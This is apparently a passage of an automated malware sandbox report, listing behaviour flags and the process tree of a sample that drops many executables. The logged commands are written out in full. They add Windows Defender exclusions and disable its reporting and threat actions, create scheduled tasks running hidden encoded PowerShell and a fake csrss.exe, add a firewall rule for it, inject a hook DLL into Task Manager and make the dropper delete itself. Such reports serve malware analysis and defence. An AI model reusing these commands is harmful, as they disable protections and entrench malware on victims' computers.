066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dw.1.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe
"C:\Users\Admin\AppData\Local\Temp\627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
C:\Users\Admin\Pictures\GJJottccSrZvHDi2rOc2biM9.exe
"C:\Users\Admin\Pictures\GJJottccSrZvHDi2rOc2biM9.exe"
C:\Users\Admin\Pictures\O0CPJ0FFbJ7m6QGvaPcCCRWK.exe
"C:\Users\Admin\Pictures\O0CPJ0FFbJ7m6QGvaPcCCRWK.exe"
C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe
"C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe
"C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2244 -ip 2244
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 852
C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe
"C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe"
C:\Users\Admin\AppData\Local\Temp\u2dw.0.exe
"C:\Users\Admin\AppData\Local\Temp\u2dw.0.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1108 -ip 1108
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1108 -ip 1108
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 616
C:\Users\Admin\AppData\Local\Temp\u2dw.1.exe
"C:\Users\Admin\AppData\Local\Temp\u2dw.1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3092 -ip 3092
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 1532
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe
"C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe" --silent --allusers=0
C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe
C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6e2ce1a8,0x6e2ce1b4,0x6e2ce1c0
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WZ5cX3pyFhvxZFq1AmkufeHv.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WZ5cX3pyFhvxZFq1AmkufeHv.exe" --version
C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe
"C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=856 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328021940" --session-guid=359b9ff4-76a1-4233-8f30-0c8fd2afda91 --server-tracking-blob=OTlmNmE3OWM3MzgyMjJjM2Y0ZTYzZTQzY2UyYzdjN2Q5Nzk3MTM0MzRiMjBlYjZhZjM3MjNjZDhmYWZiZTRhNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMTU5MjM3MC4xMTQxIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJlYTU4NGE5Yy02ZDkwLTQ1ODgtYTljYi01MjUyODNiZWMxOWEifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=9405000000000000
C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe
C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6d94e1a8,0x6d94e1b4,0x6d94e1c0
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Users\Admin\Pictures\yuVVFMVY94h4dq6orGkzD9rD.exe
"C:\Users\Admin\Pictures\yuVVFMVY94h4dq6orGkzD9rD.exe"
C:\Users\Admin\AppData\Local\Temp\7zS851E.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe
"C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe"
C:\Users\Admin\AppData\Local\Temp\7zS882B.tmp\Install.exe
.\Install.exe /FHdidhi "385118" /S
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe
"C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe"
C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe
"C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe"
C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe
"C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gqAfqLMsJ" /SC once /ST 01:29:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gqAfqLMsJ"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\Pictures\aqscNlEwGraum9ul3o4DymK7.exe
"C:\Users\Admin\Pictures\aqscNlEwGraum9ul3o4DymK7.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Users\Admin\AppData\Local\Temp\7zSC052.tmp\Install.exe
.\Install.exe
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Users\Admin\AppData\Local\Temp\7zSC340.tmp\Install.exe
.\Install.exe /FHdidhi "385118" /S
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3636 -ip 3636
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0xe30040,0xe3004c,0xe30058
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 2628
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe
"C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXsUHyRfW" /SC once /ST 01:39:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gXsUHyRfW"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe
"C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gqAfqLMsJ"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 02:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\ndbwepu.exe\" id /mCsite_idWPi 385118 /S" /V1 /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gXsUHyRfW"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 02:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\puXYKqB.exe\" id /Jysite_idmve 385118 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\puXYKqB.exe
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\puXYKqB.exe id /Jysite_idmve 385118 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
